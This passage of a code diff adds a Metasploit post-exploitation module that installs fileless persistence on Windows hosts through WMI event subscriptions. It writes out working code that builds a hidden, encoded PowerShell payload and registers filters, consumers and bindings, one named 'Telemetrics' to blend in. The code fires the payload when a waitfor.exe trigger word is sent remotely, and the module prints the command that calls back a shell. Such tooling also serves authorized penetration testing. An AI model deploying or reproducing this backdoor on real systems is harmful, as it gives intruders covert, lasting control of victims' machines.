trigger is + activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a + high integrity process. It is also recommended to use staged payloads due to powershell script length limitations. + }, + 'Author' => [ + 'Nick Tyrer <@NickTyrer>', # original module + 'h00die' # docs, persistence mixin, pshell cleanup + ], + 'License' => MSF_LICENSE, + 'Privileged' => true, + 'Platform' => 'win', + 'SessionTypes' => ['meterpreter'], + 'Targets' => [['Windows', {}]], + 'DisclosureDate' => '2017-06-06', + 'DefaultTarget' => 0, + 'References' => [ + ['URL', 'https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf'], + ['URL', 'https://learn-powershell.net/2013/08/14/powershell-and-events-permanent-wmi-event-subscriptions/'], + ['ATT&CK', Mitre::Attack::Technique::T1546_003_WINDOWS_MANAGEMENT_INSTRUMENTATION_EVENT_SUBSCRIPTION] + ], + 'Notes' => { + 'Reliability' => [EVENT_DEPENDENT, REPEATABLE_SESSION], + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS] + } + ) + ) + + register_options([ + OptString.new('WAITFOR_TRIGGER', + [true, 'The word to trigger the payload. (Default: CALL)', 'CALL' ]), + OptString.new('CLASSNAME', + [true, 'WMI event class name. (Default: UPDATER)', 'UPDATER' ]) + ]) + + register_advanced_options( + [ + OptString.new('CUSTOM_PS_COMMAND', + [false, 'Custom powershell command to run once the trigger is activated. (Note: some commands will need to be enclosed in quotes)', false, ]), + ] + ) + end + + def check + print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%') # check the original value + return CheckCode::Safe('This module requires powershell to run') unless have_powershell? + + return CheckCode::Safe('This module requires admin privs to run') unless is_admin? + + return CheckCode::Safe('This module cannot run as System') if is_system? + + return CheckCode::Safe('This module requires UAC to be bypassed first') unless is_high_integrity? + + CheckCode::Appears('Likely exploitable') + end + + def install_persistence + host = session.session_host + print_status('Installing Persistence...') + psh_exec(subscription_waitfor) + print_good "Persistence installed! Call a shell using \"waitfor.exe /S #{host} /SI #{datastore['WAITFOR_TRIGGER']}\"" + # wmic will be removed Windows 11, version 25H2 or Windows 11, version 24H2 in favor of powershell + # source https://support.microsoft.com/en-us/topic/windows-management-instrumentation-command-line-wmic-removal-from-windows-e9e83c7f-4992-477f-ba1d-96f694b8665d + # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"Telemetrics\\\" DELETE\"\n" + # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"Telemetrics\\\" DELETE\"\n" + # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"Telemetrics\\\"' DELETE\"\n" + # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"#{name_class}\\\" DELETE\"\n" + # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"#{name_class}\\\" DELETE\"\n" + # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"' DELETE\"" + name_class = datastore['CLASSNAME'] + @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM __EventFilter WHERE Name='Telemetrics'\\\" | ForEach-Object { $_.Delete() }\"\n" + @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM CommandLineEventConsumer WHERE Name='Telemetrics'\\\" | ForEach-Object { $_.Delete() }\"\n" + @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"Telemetrics\\\"'\\\" | ForEach-Object { $_.Delete() }\"\n" + @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM __EventFilter WHERE Name='#{name_class}'\\\" | ForEach-Object { $_.Delete() }\"\n" + @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM CommandLineEventConsumer WHERE Name='#{name_class}'\\\" | ForEach-Object { $_.Delete() }\"\n" + @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"'\\\" | ForEach-Object { $_.Delete() }\"\n" + end + + def build_payload + if datastore['CUSTOM_PS_COMMAND'] + script_in = datastore['CUSTOM_PS_COMMAND'] + compressed_script = compress_script(script_in) + encoded_script = encode_script(compressed_script) + generate_psh_command_line(noprofile: true, windowstyle: 'hidden', encodedcommand: encoded_script) + else + cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true) + end + end + + def subscription_waitfor + command = build_payload + word = datastore['WAITFOR_TRIGGER'] + class_name = datastore['CLASSNAME'] + <<-HEREDOC + $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM __InstanceDeletionEvent WITHIN 5 WHERE TargetInstance ISA 'Win32_Process' AND Targetinstance.Name = 'waitfor.exe'\"; QueryLanguage = 'WQL'} + $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"cmd.exe /C waitfor.exe #{word} && #{command} && taskkill /F /IM cmd.exe\"} + $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer} + $Filter1 = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"Telemetrics\"; Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325\"; QueryLanguage = 'WQL'} + $Consumer1 = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"Telemetrics\"; CommandLineTemplate = \"waitfor.exe #{word}\"} + $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter1; Consumer = $Consumer1} + Start-Process -FilePath waitfor.exe #{word} -NoNewWindow + HEREDOC + end +end